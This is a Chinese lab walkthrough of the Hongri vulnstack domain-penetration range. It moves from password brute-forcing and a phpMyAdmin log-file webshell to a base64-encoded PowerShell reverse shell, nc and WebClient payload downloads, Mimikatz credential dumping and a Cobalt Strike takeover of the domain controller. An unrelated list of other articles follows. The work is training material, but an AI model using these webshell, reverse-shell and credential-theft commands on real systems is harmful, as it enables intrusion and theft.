红日靶机(一) 笔记

news2024/11/25 15:20:35

红日靶机(一)笔记

概述

域渗透靶机,可以练习对域渗透的一些知识,主要还是要熟悉 powershell 语法,powershell 往往比 cmd 的命令行更加强大,而很多渗透开源的脚本都是 powershell 的。例如 NiShangPowerView 等等。这是域渗透的初学靶机。其中也遇到了一些问题

靶机地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

红日靶机的默认密码:hongrisec@2019

我这里

  • web:192.168.81.239
  • win7: 192.168.52.141
  • 域控: 192.168.52.138

我看的 kali 攻击机 192.168.81.37

一、nmap 扫描

1)主机发现

sudo nmap -sn 192.168.81.0/24
Nmap scan report for 192.168.81.239
Host is up (0.00047s latency).
MAC Address: 00:0C:29:EC:F8:D6 (VMware)

看到我的靶机 ip 是 192.168.81.239

2)端口扫描

sudo nmap -sT --min-rate 10000 -p- 192.168.81.239
# Nmap 7.93 scan initiated Wed Sep  4 05:56:09 2024 as: nmap -sT --min-rate 10000 -p- -o ports 192.168.81.239
Warning: 192.168.81.239 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.81.239
Host is up (0.00079s latency).
Not shown: 61205 closed tcp ports (conn-refused), 4319 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1027/tcp open  IIS
1028/tcp open  unknown
1029/tcp open  ms-lsa
1230/tcp open  periscope
3306/tcp open  mysql
MAC Address: 00:0C:29:EC:F8:D6 (VMware)

# Nmap done at Wed Sep  4 05:56:21 2024 -- 1 IP address (1 host up) scanned in 12.44 seconds

对端口进行处理

cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ','

赋值给变量

ports=$(cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ',')

3)详细信息扫描

这里在 $ports 处可以使用 tab 键显示变量的值

sudo nmap -sT -sV -sC -O -p$ports 192.168.81.239 -o details
# Nmap 7.93 scan initiated Wed Sep  4 06:01:26 2024 as: nmap -sT -sC -sV -O -p80,135,139,445,1025,1026,1027,1028,1029,1230,3306 -o details 192.168.81.239
Nmap scan report for 192.168.81.239
Host is up (0.00097s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014 
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: GOD)
1025/tcp open  msrpc        Microsoft Windows RPC
1026/tcp open  msrpc        Microsoft Windows RPC
1027/tcp open  msrpc        Microsoft Windows RPC
1028/tcp open  msrpc        Microsoft Windows RPC
1029/tcp open  msrpc        Microsoft Windows RPC
1230/tcp open  msrpc        Microsoft Windows RPC
3306/tcp open  mysql        MySQL (unauthorized)
MAC Address: 00:0C:29:EC:F8:D6 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 000c29ecf8d6 (VMware)
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   210: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-09-04T10:02:28
|_  start_date: 2024-09-04T09:46:14
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: stu1
|   NetBIOS computer name: STU1\x00
|   Domain name: god.org
|   Forest name: god.org
|   FQDN: stu1.god.org
|_  System time: 2024-09-04T18:02:28+08:00

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep  4 06:02:39 2024 -- 1 IP address (1 host up) scanned in 73.24 seconds

二、Web 渗透

打开 WEB 页面

image-20240904190151295

是一个 php 探针,往下翻

看到有个检验 mysql 的按钮

image-20240904190355871

随便输入,开启 burp 抓包

抓到

在这里插入图片描述

sudo vi pass_req

把 http 的 raw 格式粘贴进去

POST /l.php HTTP/1.1
Host: 192.168.81.239
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
Origin: http://192.168.81.239
Connection: close
Referer: http://192.168.81.239/l.php
Upgrade-Insecure-Requests: 1

host=localhost&port=3306&login=FUZZ1&password=FUZZ2&act=MySQL%E6%A3%80%E6%B5%8B&funName=

把需要爆破的参数改为 FUZZ 的样式 : login=FUZZ1&password=FUZZ2

1)密码爆破

这里我用的 ffuf 工具,-mode 可以指定爆破模式,-w 也是制定了比较常规的用户名和密码的弱口令字典

当然喜欢用 burp 也没关系,看个人喜好吧

sudo ffuf --request pass_req -u http://192.168.81.239 -w /usr/share/SecLists/Usernames/top-usernames-shortlist.txt:FUZZ1 -w /usr/share/SecLists/Passwords/2023-200_most_used_passwords.txt:FUZZ2 -fs 14807 -mode clusterbomb

结果:


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : POST
 :: URL              : http://192.168.81.239
 :: Wordlist         : FUZZ1: /usr/share/SecLists/Usernames/top-usernames-shortlist.txt
 :: Wordlist         : FUZZ2: /usr/share/SecLists/Passwords/2023-200_most_used_passwords.txt
 :: Header           : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 :: Header           : Accept-Language: en-US,en;q=0.5
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Header           : Origin: http://192.168.81.239
 :: Header           : Connection: close
 :: Header           : Referer: http://192.168.81.239/l.php
 :: Header           : Host: 192.168.81.239
 :: Header           : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
 :: Header           : Accept-Encoding: gzip, deflate
 :: Header           : Upgrade-Insecure-Requests: 1
 :: Data             : host=localhost&port=3306&login=FUZZ1&password=FUZZ2&act=MySQL%E6%A3%80%E6%B5%8B&funName=
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 14807
________________________________________________

[Status: 200, Size: 14804, Words: 1464, Lines: 401, Duration: 2136ms]
    * FUZZ1: root
    * FUZZ2: root

:: Progress: [3400/3400] :: Job [1/1] :: 19 req/sec :: Duration: [0:02:59] :: Errors: 0 ::

存在弱口令 root:root

我们写进凭证里

echo 'root:root' > creds

2)目录爆破

拿到了数据库凭证,而这是一个 phpstudy 的网站,我们进行一下目录爆破,看看有没有什么后台页面之类的

sudo gobuster dir -u http://192.168.81.239 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

这里用的 gobuster 当然很多工具都可以进行目录爆破比如:feroxbuster ffuf dirb dirsearch wfuzz 等都有相应的功能,只是工具会采用不同的算法,在我们一个工具没法走下去的时候,可以尝试另一个工具,很有可能就会有我们想要的结果

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.81.239
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/%20                  (Status: 403) [Size: 210]
/*checkout*           (Status: 403) [Size: 219]
/phpmyadmin           (Status: 301) [Size: 241] [--> http://192.168.81.239/phpmyadmin/]
/*docroot*            (Status: 403) [Size: 218]
/*                    (Status: 403) [Size: 210]
/con                  (Status: 403) [Size: 212]
/http%3A              (Status: 403) [Size: 214]
/**http%3a            (Status: 403) [Size: 216]
/*http%3A             (Status: 403) [Size: 215]
/aux                  (Status: 403) [Size: 212]
/**http%3A            (Status: 403) [Size: 216]
/%C0                  (Status: 403) [Size: 210]
/%3FRID%3D2671        (Status: 403) [Size: 218]
/devinmoore*          (Status: 403) [Size: 220]
/200109*              (Status: 403) [Size: 216]
/*sa_                 (Status: 403) [Size: 213]
/*dc_                 (Status: 403) [Size: 213]
/%D8                  (Status: 403) [Size: 210]
/%CE                  (Status: 403) [Size: 210]
/%CF                  (Status: 403) [Size: 210]
/%CD                  (Status: 403) [Size: 210]
/%CB                  (Status: 403) [Size: 210]
/%CC                  (Status: 403) [Size: 210]
/%D1                  (Status: 403) [Size: 210]
/%CA                  (Status: 403) [Size: 210]
/%D0                  (Status: 403) [Size: 210]
/%D3                  (Status: 403) [Size: 210]
/%D6                  (Status: 403) [Size: 210]
/%D7                  (Status: 403) [Size: 210]
/%D5                  (Status: 403) [Size: 210]
/%D4                  (Status: 403) [Size: 210]
/%D2                  (Status: 403) [Size: 210]
/%C9                  (Status: 403) [Size: 210]
/%C1                  (Status: 403) [Size: 210]
/%C8                  (Status: 403) [Size: 210]
/%C2                  (Status: 403) [Size: 210]
/%C5                  (Status: 403) [Size: 210]
/%C6                  (Status: 403) [Size: 210]
/%C7                  (Status: 403) [Size: 210]
/%C3                  (Status: 403) [Size: 210]
/%C4                  (Status: 403) [Size: 210]
/%D9                  (Status: 403) [Size: 210]
/%DE                  (Status: 403) [Size: 210]
/%DF                  (Status: 403) [Size: 210]
/%DD                  (Status: 403) [Size: 210]
/%DB                  (Status: 403) [Size: 210]
/phpMyAdmin           (Status: 301) [Size: 241] [--> http://192.168.81.239/phpMyAdmin/]
/login%3f             (Status: 403) [Size: 215]
/%22james%20kim%22    (Status: 403) [Size: 230]
/%22julie%20roehm%22  (Status: 403) [Size: 232]
/%22britney%20spears%22 (Status: 403) [Size: 235]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

phpMyAdmin 页面,我们访问一下

在这里插入图片描述

输入刚爆破出来的凭证 root:root 就登陆到数据库的后台了

在这里插入图片描述

三、获得立足点

phpmyadmin 后台 getshell 的方法

  1. 直接在 web 目录用 select … into outfile 写入 webshell (需要有写权限)
  2. 利用日志写入 webshell

第一种我们执行

SHOW VARIABLES LIKE '%secure%'

看到

在这里插入图片描述

secure_file_priv 值为 NULL 禁止写入文件,如果这个值为目录名称,则可以在指定目录写入文件。
这个值是只读变量,只能通过配置文件修改。

第一种走不通了

第二种 利用日志文件

SHOW VARIABLES LIKE 'general%'

在这里插入图片描述

general_log: 表示日志功能的开关,我们可以通过 sql 语句设置它

general_log_file: 它指定了我们日志生成的绝度路径

日志开启将会记录我们所有的 sql 语句操作

 set global general_log=on;# 开启日志
 
 set global general_log_file='C:/phpStudy/WWW/lingx5.php';# 设置日志位置为网站目录

绝对路径刚开始的 php 探针已经有了,让我们把全局日志记录打开

在这里插入图片描述

执行

select '<?php @eval($_GET["code"]);?>'

访问

image-20240904200224427

反弹 shell

真正的攻防中,也是不建议直接菜刀,蚁剑等工具直接连接,应为他们的流量特征过于明显,稍不注意就会引起流量监测设备的告警。而哥斯拉虽然在流量上做了加密,但是它的木马格式,通信协议和行为特征相对固定,如果要用的话还是建议自己在基础上做二次开发,达到对一些检测设备的绕过。

a) 错误的尝试

在 kali 端,安装 nc.exe,开启 smbserver 服务,并开启监听

下面命令使用 python 在当前文件夹开启一个名为 share 的 smb 共享目录

python /usr/share/doc/python3-impacket/examples/smbserver.py share .

监听端口

nc -lvp 8888

image-20240904211825105

命令注入,访问链接

http://192.168.81.239/lingx5.php?code=system('\\\\192.168.81.37\\share\\nc.exe -e cmd.exe 192.168.81.37 8888 );

这里 smb 显示连接正常。等了半天没弹回来,有点气人,我作弊去它的 window7 里看了看,发现

image-20240904212431033

这台靶机的 win7 不兼容 nc 啊,我试了 64 位和 32 位,都不兼容。不过这也是一个思路,告诉给大家,让大家对 smb 服务有更加深刻的印象

b) 直接命令注入

google 搜索 :php reverse windows powershell

看了篇文章:https://int0x33.medium.com/from-php-s-hell-to-powershell-heaven-da40ce840da8

用 rlwrap 获得一个交互性更强的 shell

sudo rlwrap nc -lvp 8888

powershell 建立连接的命令

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.81.37',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

进行 base64 编码

cG93ZXJzaGVsbCAtbm9wIC1jICIkY2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCcxOTIuMTY4LjgxLjM3Jyw4ODg4KTskc3RyZWFtID0gJGNsaWVudC5HZXRTdHJlYW0oKTtbYnl0ZVtdXSRieXRlcyA9IDAuLjY1NTM1fCV7MH07d2hpbGUoKCRpID0gJHN0cmVhbS5SZWFkKCRieXRlcywgMCwgJGJ5dGVzLkxlbmd0aCkpIC1uZSAwKXs7JGRhdGEgPSAoTmV3LU9iamVjdCAtVHlwZU5hbWUgU3lzdGVtLlRleHQuQVNDSUlFbmNvZGluZykuR2V0U3RyaW5nKCRieXRlcywwLCAkaSk7JHNlbmRiYWNrID0gKGlleCAkZGF0YSAyPiYxIHwgT3V0LVN0cmluZyApOyRzZW5kYmFjazIgPSAkc2VuZGJhY2sgKyAnUFMgJyArIChwd2QpLlBhdGggKyAnPiAnOyRzZW5kYnl0ZSA9IChbdGV4dC5lbmNvZGluZ106OkFTQ0lJKS5HZXRCeXRlcygkc2VuZGJhY2syKTskc3RyZWFtLldyaXRlKCRzZW5kYnl0ZSwwLCRzZW5kYnl0ZS5MZW5ndGgpOyRzdHJlYW0uRmx1c2goKX07JGNsaWVudC5DbG9zZSgpIg==

因为命令里的特殊字符的问题,我尝试着直接输入或者进行 url 编码,都没有反弹不成功,所以就用 base64 编码,再用 php 函数的 base64_decode()方法解码,避免特殊字符带来的干扰

访问链接

http://192.168.81.239/lingx5.php?code=system(base64_decode("cG93ZXJzaGVsbCAtbm9wIC1jICIkY2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCcxOTIuMTY4LjgxLjM3Jyw4ODg4KTskc3RyZWFtID0gJGNsaWVudC5HZXRTdHJlYW0oKTtbYnl0ZVtdXSRieXRlcyA9IDAuLjY1NTM1fCV7MH07d2hpbGUoKCRpID0gJHN0cmVhbS5SZWFkKCRieXRlcywgMCwgJGJ5dGVzLkxlbmd0aCkpIC1uZSAwKXs7JGRhdGEgPSAoTmV3LU9iamVjdCAtVHlwZU5hbWUgU3lzdGVtLlRleHQuQVNDSUlFbmNvZGluZykuR2V0U3RyaW5nKCRieXRlcywwLCAkaSk7JHNlbmRiYWNrID0gKGlleCAkZGF0YSAyPiYxIHwgT3V0LVN0cmluZyApOyRzZW5kYmFjazIgPSAkc2VuZGJhY2sgKyAnUFMgJyArIChwd2QpLlBhdGggKyAnPiAnOyRzZW5kYnl0ZSA9IChbdGV4dC5lbmNvZGluZ106OkFTQ0lJKS5HZXRCeXRlcygkc2VuZGJhY2syKTskc3RyZWFtLldyaXRlKCRzZW5kYnl0ZSwwLCRzZW5kYnl0ZS5MZW5ndGgpOyRzdHJlYW0uRmx1c2goKX07JGNsaWVudC5DbG9zZSgpIg==")); 

成功弹回 shell

在这里插入图片描述

撞大运了弹回来直接就是 system 权限的用户,省的提权了

获得 shell,先改编码格式

chcp 65001

四、域信息搜集

查看网卡
ipconfig /all

在这里插入图片描述

在这里插入图片描述

发现一块 192.168.52.0 网段的网卡,应该就是域对应的内网网卡,本机的 hostname 和域的信息也可以看到

系统信息
systeminfo

在这里插入图片描述

看到 domian 字段是 god.org 代表这是域内的机器。

普通机器的默认字段是:WORKGROUP

也可以看到机器打过补丁的一些信息,还有网卡信息

路由信息
route pirnt

在这里插入图片描述

其他主机信息
net view

在这里插入图片描述

查看域管理员

在这里插入图片描述

五、域渗透

我们通过信息收集,知道了域控主机是 owa,域名为 god.org

查看域控主机 ip

ping owa.god.org

在这里插入图片描述

看到域控 ip 为 192.168.52.138

使用 mimikatz 进行密码抓取

1)上传 Invoke-mimikatz.ps1

Invoke-mimikatz.ps1 连接:https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1

开启 http 服务

php -S 0:80

查看机器的 powershell 版本信息

$PSVersionTable.PSVersion

因为 powershell3.0 前后的命令有些许的差别

image-20240905102653425

目标机器上的 powershell 是 2.0 版本的 而 Invoke-WebRequest cmdlet 是从 PowerShell 3.0 开始引入的

我们使用.NET 类 System.Net.WebClient 来实现下载功能

powershell -command "& {(New-Object System.Net.WebClient).DownloadFile('http://192.168.81.37/Invoke-Mimikatz.ps1','c:\program files\Invoke-Mimikatz.ps1')}"

在这里插入图片描述

在 http 服务处看到上传成功

上传到了 c:\program files 目录下

cd c:\'program files'
dir

在这里插入图片描述

看到上传成功了

当然在 mimikatz 也是需要做免杀的,不然对它的操作也是会触发杀毒软件的

2)运行 mimikatz

在 powershell 中运行 Invoke-Mimikatz.ps1 首先我们要解除执行策略

Get-ExecutionPolicy

Restricted:不允许任何脚本运行。

AllSigned:只运行由受信任的发布者签名的脚本。

RemoteSigned:本地创建的脚本可以运行,远程下载的脚本必须是签名的。

Unrestricted:允许所有脚本运行,但运行从互联网下载的脚本时会有警告。

我们设置为 RemoteSigned 即可

Set-ExecutionPolicy RemoteSigned -Scope CurrentUser

image-20240905142321237

当然也可是使用 Bypass 这个参数进行单次命令的绕过

导入

Import-moudle .\Invoke-Mimikatz.ps1

加载

.\Invoke-Mimikatz.ps1

执行

Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords"

没有反应了

理论上 应该是可以正常抓取密码的,这台靶机我打着也有很多问题。

尝试解决问题(失败)

觉得会不会是用 php 执行代码返回来的 powershell 不是很稳定导致的

我们用 nishang 的 tcp 的脚本,反弹回来的会不会更加稳定呢?尝试用 nishang 反弹

sudo apt install nishang

输入命令 nishang 就可以看到目录

nishang
cd Shells

看到 Invoke-PowerShellTcp.ps1 文件

sudo vi Invoke-PowerShellTcp.ps1

在它的文件底部加上反弹 shell 的语句

Invoke-PowerShellTcp -Reverse -IPAddress 192.168.81.37 -Port 4444

在这里插入图片描述

就是等他加载到内存中去执行反弹 shell 的逻辑

kali 监听,同时开启 http 服务

nc -lvp 4444

php -S 0:80

在命令行执行

powershell -command "& {(new-object system.net.webclient).downloadfile('http://192.168.81.37/Invoke-PowerShellTcp.ps1','c:\Invoke-PowerShellTcp.ps1')}" ; c:\Invoke-PowerShellTcp.ps1

在这里插入图片描述

下载成功,收到反弹 shell,但是和之前的 shell 是一样的,还是不能运行 mimikatz.ps1

3)更换思路(使用 cobalstrike)

启动 cs

./teamserver localhost 123456
./cobalstrike

生成木马,并上传

powershell -ExecutionPolicy Bypass -command "& {(New-Object System.Net.WebClient).DownloadFile('http://192.168.81.37/artifact.exe', 'C:\Users\Public\artifact.exe')}"

image-20240908140727778

启动 artifact.exe

cmd.exe /c ".\artifact.exe" 

image-20240908141454607

成功上线

image-20240908141543698

端口扫描

image-20240908141817252

image-20240908141906193

看到

image-20240908142258719

image-20240908142321629

运行 mimikatz

image-20240908142720247

在这里插入图片描述

看到域控 owa 的密码 hongrisec@2022

六、获得域控

已经有了域控管理员的密码拿到域控就简单了

在 cs 上创建 SMB 监听

image-20240908143836586

直接 jump

image-20240908143908306

看到域控上线了

image-20240908144157561

域控拿到了,这个域我就随便走了

跳到 141 主机

image-20240908144330710

image-20240908144527049

成功拿下三台

image-20240908145009742

总结

  1. 通过 nmap 扫描看到目标 web 服务器开放了 80,135,3306 等端口,通过对 80 端口的目录爆破,弱口令的 fuzz,发现了 phpmyadmin 的后台,并成功登陆。
  2. 利用数据库的日志输出,写入了一句话木马,成功反弹了 powershell 的命令行,因为 powershell2.0 命令行的缺陷,在域渗透信息收集的时候遇到了 mimikatz 不能使用的情况,尝试解决但失败了。
  3. 最后使用了 cobalstrike 的集成化工具完成了对域控的横向移动,成功获得域控管理员权限。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2122543.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

料品档案没有配置主供应商信息

这个问题经常会出现在普通用户的面前。没有合适的工程人员去打理料品档案。信息是缺漏的。用友给出来的提示&#xff0c;也让人摸不着头脑。只能是记下来备用吧。

Ai+若依(集成easyexcel实现excel表格增强)

EasyExcel 介绍 官方地址:EasyExcel官方文档 - 基于Java的Excel处理工具 | Easy Excel 官网 Java解析、生成Excel比较有名的框架有Apache poi、jxl。但他们都存在一个严重的问题就是非常的耗内存,poi有一套SAX模式的API可以一定程度的解决一些内存溢出的问题,但POI还是有一…

Web3 项目安全手册

现如今针对 Web3 项目的攻击手法层出不穷&#xff0c;且项目之间的交互也越发复杂&#xff0c;在各个项目之间的交互经常会引入新的安全问题&#xff0c;而大部分 Web3 项目研发团队普遍缺少的一线的安全攻防经验&#xff0c;并且在进行 Web3 项目研发的时候&#xff0c;重点关…

JavaWeb中处理 Web 请求的方式总结

文章目录 JavaWeb中处理 Web 请求的方式总结1. 原始的 Servlet 方式1.1. 环境搭建**创建 Maven 或 Gradle 项目**&#xff1a;**添加 Servlet 依赖**&#xff1a;**创建 Servlet 类**&#xff1a;**配置项目**&#xff1a;**配置 Tomcat**&#xff1a; 1.2. 路由机制1.3. 示例代…

[产品管理-4]:NPDP新产品开发 - 2 - 制定企业经营战略目标的结构化方法与工具

目录 一、SWOT分析工具 1、SWOT分析工具概述 2、SWOT分析与企业战略目标制定的关系 3、SWOT分析在企业战略目标制定中的应用实例 4、SWOT分析的改进与应用建议 二、P E S T L E 分 析&#xff1a;外部环境分析 2.1 概述 1. 政治因素&#xff08;Political&#xff09; …

2024第三届大学生算法大赛 真题训练3 解题报告 | 珂学家

前言 题解 C. 洞穴探险 题目描述&#xff1a; 简单来说&#xff0c;就是 在一个无向图中&#xff0c;两个点之间关系 (存在多条简单路径&#xff0c;一条简单路径&#xff0c;不联通&#xff09;, 请判断两点之间的关系。 思路: 并查集 tarjan割边 对于通联和非联通&#x…

Java学习Day41:手刃青背龙!(spring框架之事务)

1.spring事务概念 在数据层和业务层保证一系列数据库操作原子性成功失败&#xff01;&#xff08;相比事务可以在业务层开启&#xff09; 1.事务定义&#xff1a;关键字&#xff1a;Transactional&#xff08;一般写在接口上&#xff09; 2.事务管理器&#xff1a;在JdbcCon…

vscode ssh离线远程连接ubuntu调试

遇见问题&#xff1a; 1 ssh连接上无法启动服务器的虚拟环境&#xff1b; 2 ssh连接上启动服务器的虚拟环境后无法打断点&#xff1b; 对于问题需要参考下面连接安装python和debugy的插件拓展&#xff0c;并且配置json文件link。VSCode - 离线安装扩展python插件教程_vscode…

web 自动化测试框架 TestCafe 安装和入门使用

一、TestCafe 介绍&#xff1a; TestCafe 是一款基于 Node.js 的端到端 Web 自动化测试框架&#xff0c;支持 TypeScript 或 JavaScript 来编写测试用例&#xff0c;运行用例&#xff0c;并生成自动化测试报告。 TestCafe 兼容 Windows&#xff0c;MacOS 和 Linux 系统&#x…

基于C++实现(控制台+界面)通讯录管理系统

个人通讯录管理系统 问题描述&#xff1a; 主要内容&#xff1a; 个人通讯录是记录了同学&#xff08;包含一起上学的学校名称&#xff09;、同事&#xff08;包含共事的单位名称&#xff09;、朋友&#xff08;包含认识的地点&#xff09;、亲戚&#xff08;包含称呼&#…

国家级|加速科技成功入选国家级专精特新“小巨人”企业

9月6日&#xff0c;浙江省通过的第六批专精特新“小巨人”企业名单在省经济和信息化厅官网完成公示&#xff0c;经过严格评审&#xff0c;杭州加速科技有限公司正式获国家级专精特新“小巨人”企业认定。 专精特新”小巨人”企业具备专业化、精细化、特色化、新颖化特征&#x…

“我”变小了但更强了!英伟达发布最新大语言模型压缩技术,无损性能且提升数倍!

1. 摘要 英伟达研究团队提出了一份全面报告&#xff0c;详细介绍了如何使用剪枝和蒸馏技术将Llama 3.1 8B和Mistral NeMo 12B模型分别压缩至4B和8B参数。他们探索了两种不同的剪枝策略&#xff1a;深度剪枝和联合隐藏/注意力/MLP&#xff08;宽度&#xff09;剪枝。 研究人员…

Adoptium Temurin JDK 的下载

在当今的软件开发领域&#xff0c;Java 无疑是最受欢迎和广泛使用的编程语言之一。Java 开发工具包&#xff08;JDK&#xff09;是任何 Java 开发者不可或缺的工具&#xff0c;它提供了编译、调试和运行 Java 应用程序所需的所有工具和库。Eclipse Temurin 是一个流行的开源 JD…

网络药理学:分子动力学模拟入门、gromacs能量最小化

推荐视频 B站&#xff1a; 讲的都是有效的概论&#xff0c;其中关于分子动力学模拟归纳的三步挺有用的。 B站&#xff1a;也没有讲清楚关于分子对接后得到的文件该如何处理。 B站&#xff1a; 需要用的是autodock vina&#xff0c;而且走过一遍up主之前分子对接的视频才比较…

mysql笔记3(数据库、表和数据的基础操作)

文章目录 一、数据库的基础操作1. 显示所有的仓库(数据库)2. 创建数据库注意(命名规范)&#xff1a; 3. 删除数据库4. 查看创建数据库的SQL5. 创建数据库时跟随字符编码6. 修改数据库的字符编码 二、表的基础操作1. 引入表的思维2. 引用数据库3. 查看该数据库下面的表4. 创建表…

终端安全如何防护?一文为你揭晓答案!

终端安全防护是确保组织内部网络及其连接设备免受威胁的关键措施。 以下是终端安全防护的一些核心方法&#xff1a; 1. 资产管理与识别 摸清家底&#xff1a;识别所有连接到网络的终端设备及其状态&#xff0c;包括硬件和软件配置。 资产分类&#xff1a;确定哪些资产最为关…

华三(H3C)HDM服务器硬件监控指标解读

在当今日益复杂的IT环境中&#xff0c;服务器的稳定运行对于保障业务的连续性至关重要。华三&#xff08;H3C&#xff09;作为知名的网络设备供应商&#xff0c;其HDM&#xff08;Hardware Diagnostic Module&#xff09;技术为服务器硬件的监控提供了强有力的支持。监控易作为…

如何使用SSHFS通过SSH挂载远程文件系统?

SHFS&#xff08;SSH 文件系统&#xff09;是一款功能强大的工具&#xff0c;它允许用户通过 SSH 挂载远程文件系统&#xff0c;从而提供一种安全便捷的方式来访问远程文件&#xff0c;就像访问本地文件一样。本文将引导您完成使用 SSHFS 挂载远程文件系统的过程&#xff0c;为…

【自动化与控制系统】SCI一区TOP神刊!最快19天accept、稳定检索!

期刊解析 &#x1f6a9;本 期 期 刊 看 点 &#x1f6a9; 国人发文占比第一&#xff0c;TOP刊 审稿友好&#xff0c;审稿速度快 自引率9.8% 今天小编带来计算机领域SCI快刊的解读&#xff01; 如有相关领域作者有意投稿&#xff0c;可作为重点关注&#xff01; 01 期刊信息…

pytlsd在Win10下编译与使用

下载pytlsd项目,GitHub - iago-suarez/pytlsd: Python transparent bindings for LSD (Line Segment Detector) CMake配置 Windows 10,Visual Studio 2019下编译 Release版本生成文件包括: 测试代码: # -*- coding: utf-8 -*- import cv2 import matplotlib.pyplot as p…